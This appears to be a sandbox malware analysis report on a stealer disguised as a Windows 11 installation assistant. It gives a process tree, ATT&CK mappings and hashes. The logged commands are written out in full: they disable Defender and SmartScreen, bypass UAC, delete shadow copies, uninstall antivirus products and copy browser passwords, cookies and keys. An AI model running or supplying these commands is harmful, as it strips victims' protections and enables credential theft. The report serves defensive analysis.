C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exerp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4136 -
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3416 -
C:\Windows\system32\rEG.EXE"C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f9⤵PID:4444
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\.cmd""5⤵
- System Location Discovery: System Language Discovery
PID:2820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip6⤵
- System Location Discovery: System Language Discovery
PID:1636 -
C:\Windows\SysWOW64\curl.exeCUrL -S ipINFO.io/Ip7⤵
- System Location Discovery: System Language Discovery
PID:4888
-
-
-
-
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5064 -
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:3788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\qf16owjrosxtg1b240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\1apee2pq240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\oia5c9p871t240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\936i6c2ysb240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\foe3ysq410f240645453.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ncbfn8vuxc240664046.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\t31j3c804mqki240664046.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\kxwijg5d0240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\rosnq51ksrisakub240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\irf37rj215240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\0pg7b8xtdpt240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\13s111wjws4240672703.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ne9rtc7kbn240678812.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\iv06ldrfve1q240678812.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\9cfdnzmzgmbbf2240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\mgec5fx5240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\kgjwak4w4a2240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\egswv9dl2ib240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\8pt5qxkvfy240684187.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\vvk7o2jve6r240695546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ikpx0390o67sm1ea240695546.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\suljw2nzvdw7df240704281.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\l6eg9f1n240704281.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\0lq3klkq240704281.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\smjburzfkimk240704281.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\j4pr1w7zv2vr9y240704281.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\znxydv4lvul240710640.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\u85hddtuaaf240710640.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\se04f8fucdzhku240717171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\2vjn29ve0d1jkuz240717171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\ayvb9hgj3a672r0r240717265.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\0hdirnbx21weo99240717265.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\gzqafmovbudy1ml240730390.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\am8xvjdg6ag240730390.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\pusyq5r1yzdsuc240730484.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\et4u53ajr3jt3xs1240730484.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\CompleteSkip.bin\" \"C:\Users\Admin\AppData\Local\Temp\jl6tlwvxond4iozcrp.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ConvertWait.ico\" \"C:\Users\Admin\AppData\Local\Temp\8uyyafnohn9mx66riu90rzsz.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DenyBackup.wmx\" \"C:\Users\Admin\AppData\Local\Temp\b3s9il2g35ebbgi0s4cw.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisconnectUnpublish.rle\" \"C:\Users\Admin\AppData\Local\Temp\ln0kp3k13g822j7pgwi07e3ff3bv.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ExitGroup.emf\" \"C:\Users\Admin\AppData\Local\Temp\louixdfy8ktt19wkoopgduw34ca.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\FindSubmit.sql\" \"C:\Users\Admin\AppData\Local\Temp\l0fd5a3g6xav6isorkq8e.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\GroupImport.vsdm\" \"C:\Users\Admin\AppData\Local\Temp\i1qw1ikbvqg9kxzcjfru8dkwz7.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\InitializeDismount.reg\" \"C:\Users\Admin\AppData\Local\Temp\ou9yox96qaw23glh99sueu1fqaezg0.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\InvokeSend.vsd\" \"C:\Users\Admin\AppData\Local\Temp\lqkggrd2cdn6g4yklxp4orl6.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\LimitConvert.docx\" \"C:\Users\Admin\AppData\Local\Temp\7l3iznobp430kighpzlcwdx7r1f.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\Microsoft Edge.lnk\" \"C:\Users\Admin\AppData\Local\Temp\hrlp3i8jy8hujc48j9nxwo6xfj.tmp\" -Force"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1116
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "2⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\reg.exerEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F3⤵
- UAC bypass
PID:1660
-
-
C:\Windows\system32\reg.exereg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f3⤵
- UAC bypass
PID:1124
-
-
C:\Windows\system32\reg.exerEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f3⤵
- UAC bypass
PID:2808
-
-
C:\Windows\system32\reg.exereg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f3⤵PID:1496
-
-
C:\Windows\system32\reg.exereG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f3⤵PID:4060
-
-
C:\Windows\system32\reg.exereG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F3⤵PID:4964
-
-
C:\Windows\system32\reg.exerEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F3⤵PID:4564
-
-
C:\Windows\system32\reg.exerEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F3⤵PID:420
-
-
C:\Windows\system32\reg.exereG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f3⤵PID:1524
-
-
C:\Windows\system32\reg.exerEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f3⤵PID:3484
-
-
C:\Windows\system32\reg.exerEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f3⤵PID:1000
-
-
C:\Windows\system32\reg.exereG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f3⤵PID:2916
-
-
C:\Windows\system32\reg.exerEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F3⤵PID:2952
-
-
C:\Windows\system32\reg.exereG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f3⤵PID:4900
-
-
C:\Windows\system32\reg.exereG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F3⤵
- Modifies Windows Defender notification settings
PID:1116
-
-
C:\Windows\system32\reg.exereg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F3⤵PID:1184
-
-
C:\Windows\system32\reg.exerEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F3⤵PID:2480
-
-
C:\Windows\system32\reg.exereG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F3⤵PID:3156
-
-
C:\Windows\system32\reg.exereg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F3⤵PID:4452
-
-
C:\Windows\system32\reg.exerEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f3⤵PID:3160
-
-
C:\Windows\system32\reg.exereg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f3⤵PID:3112
-
-
C:\Windows\system32\reg.exerEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f3⤵PID:1252
-
-
C:\Windows\system32\reg.exereG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F3⤵PID:1448
-
-
C:\Windows\system32\reg.exerEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F3⤵PID:2920
-
-
C:\Windows\system32\reg.exerEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F3⤵PID:1584
-
-
C:\Windows\system32\reg.exereG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f3⤵PID:2044
-
-
C:\Windows\system32\reg.exerEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f3⤵PID:2232
-
-
C:\Windows\system32\icacls.exeicaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C3⤵
- Modifies file permissions
PID:2116
-
-
C:\Windows\system32\icacls.exeiCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c3⤵
- Modifies file permissions
PID:4780
-
-
C:\Windows\system32\vssadmin.exevssadmin dELETe shadOws /aLl /QuIEt3⤵
- Interacts with shadow copies
PID:860
-
-
C:\Windows\system32\attrib.exeaTTrIb +S +H C:\TMP3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4104
-
-
C:\Windows\system32\find.exefind /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:1384
-
-
C:\Windows\system32\find.exefind /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2860
-
-
C:\Windows\system32\find.exefind /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4120
-
-
C:\Windows\system32\find.exefind /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:1632
-
-
C:\Windows\system32\find.exefind /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2776
-
-
C:\Windows\system32\find.exefind /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3524
-
-
C:\Windows\system32\find.exefind /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4724
-
-
C:\Windows\system32\find.exefind /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2988
-
-
C:\Windows\system32\find.exefind /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4836
-
-
C:\Windows\system32\find.exefind /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2852
-
-
C:\Windows\system32\find.exefind /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4268
-
-
C:\Windows\system32\find.exefind /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2488
-
-
C:\Windows\system32\find.exefind /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3852
-
-
C:\Windows\system32\find.exefind /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:1284
-
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:276
-
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2676
-
-
C:\Windows\system32\find.exefind /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4904
-
-
C:\Windows\system32\find.exefind /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3264
-
-
C:\Windows\system32\find.exefind /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4512
-
-
C:\Windows\System32\Wbem\WMIC.exewmic product where name="ESET Security" call uninstall /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
C:\Windows\System32\Wbem\WMIC.exewmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive3⤵PID:3156
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f3⤵PID:3524
-
-
C:\Windows\system32\cmd.execmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f3⤵PID:1504
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:560
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3828
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify Tools
3Indicator Removal
2File Deletion
2Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD588dc70c361a22feac57b031dd9c1f02f
SHA1a9b4732260c2a323750022a73480f229ce25d46d
SHA25643244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA51219c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c
-
Filesize
1KB
MD50ac871344dc49ae49f13f0f88acb4868
SHA15a073862375c7e79255bb0eab32c635b57a77f98
SHA256688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37
SHA512ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006
-
Filesize
1KB
MD5a28c02af6cefdbe36e78dcef7d28174e
SHA1229da39044752b3c6d8ff548dafd0b45bfec4046
SHA25645223a4f7f19aa9fb5fcc63c2f1e7363e2e9226817b5ef2b30f0f1a869a1db0a
SHA51299a16b83b9a514ededcd30dd1135cf43ec418cb145161fdbba8c7319e4d70dfa9a2c44180215f6f859e0345901103f5517f4543f59e6e949cdb057c672020661
-
Filesize
1KB
MD5558251ab9bc9c2e10e44975a894657a5
SHA17e6272db305c4da30b8ce063274bde520f0b4a92
SHA256ef8a4bd0c8abbb6dd921e1c04c7e5b54eaca2079f8ae5eaed3f9db7ec9de43e4
SHA512239a85d42c6546dc28bb7c76b448632a959695b64045baaef6abd83a5246884adba715b74cc1debe4ff126c838a36b4fe10eb2bc080f0957d421f3e932310ecf
-
Filesize
1KB
MD5c4273f170169bb353809542b107cbd85
SHA11dc690ec9521c5aded719c7925d428271eeb2706
SHA256b3efd6f2403ed3b19c8e7488b272bd2d024fe64d1ada4e5e22a2041fa66157f4
SHA5129a23e0d07db1f8ca882ffe6b669bb2814a3f19b148d7a27b9c1f4e139be76bf81ceae73714d0e43e397c463265b58bbe411be662f50f1f96a081229ca378d6fc
-
Filesize
1KB
MD5e5c112cd94bf70f4ed28f38c1f7f77ea
SHA157166a77f586d69bb20f73010b4cebc096ae547e
SHA25650b37805575f20df2ffb5db5155c897a5c80d043dd845c7f441938bedbd3927c
SHA512b38ab000f245e76280a358f1020203df3cd9877e750f94bfcb8966129ebee328e4f625b2fb3592ef449d9fd05f4213d597bed175bbcc2c76fa54e28acebe3800
-
Filesize
1KB
MD510254f48b63b60ae6245903153592e48
SHA12c300d1c60c50e8896705022bc402c423681f40a
SHA256b3778ffb5260878714023fd1abc70c4e850b5397c2b32a3975b1ff28bfd96c69
SHA5126a7e7844c47a07bc8fd0b59267f0d1bac460f672ada93131edd65ca2eb33159de9f6291a1acde745f32991b364e9ceac697f2dfcf1a2696b51a9120dd7af77d4
-
Filesize
224KB
MD58566283dfca310d83f7a01ea331b2b45
SHA1bec1230578a4d4868dea90cfa0ee164d6b9a6359
SHA256792739bc125102e5f41e3e8201e01c5c93fd9c974cd822223b05c4aa69fab8b1
SHA512a2d3a49fff50a685c1d9bd041037f98c8e3b1f72c12bfb245716f845b2049c0304c8f3c648ec4077bd0da01aa1b6cba1921e3dfd1d7f1d66b53748e5c28b54c9
-
Filesize
10KB
MD5eeba08205e37c96d0cd827c4c52fa1ee
SHA1e613d220aa3ee59f244eeb3c3168712ce2d03ad2
SHA256c6c7eb15ef41404fbd3db5ca99cbeb52da54cb6d0c8d05e4abbb31afe103693a
SHA512796951952ad013868cbcc160e51e05888fb1c61a9a8781849733db058ac251a09eb892d163aedb3b8c897b19d56d4257ddaab0608493b4d5257f16d3e1e1e71a
-
Filesize
29KB
MD5c857a930b241455b7961a16c96ddf256
SHA140f6df790dc7bc1e7daa1f48a729453a2ffd9efa
SHA256b2023c405900d194c0a00ea1cabefa96f3abcb73c2da88c3802594811a128bbc
SHA512702b4c9327cddd5d8baac050376143e42ac4632afb0e1b605a0d3a7d448a9f570296981b509f66cab56926a6c52bb8fd90b6014a89d433e3b8f41396b6fe7bcb
-
Filesize
29KB
MD5a69e54b63a067cefab41736717e9348b
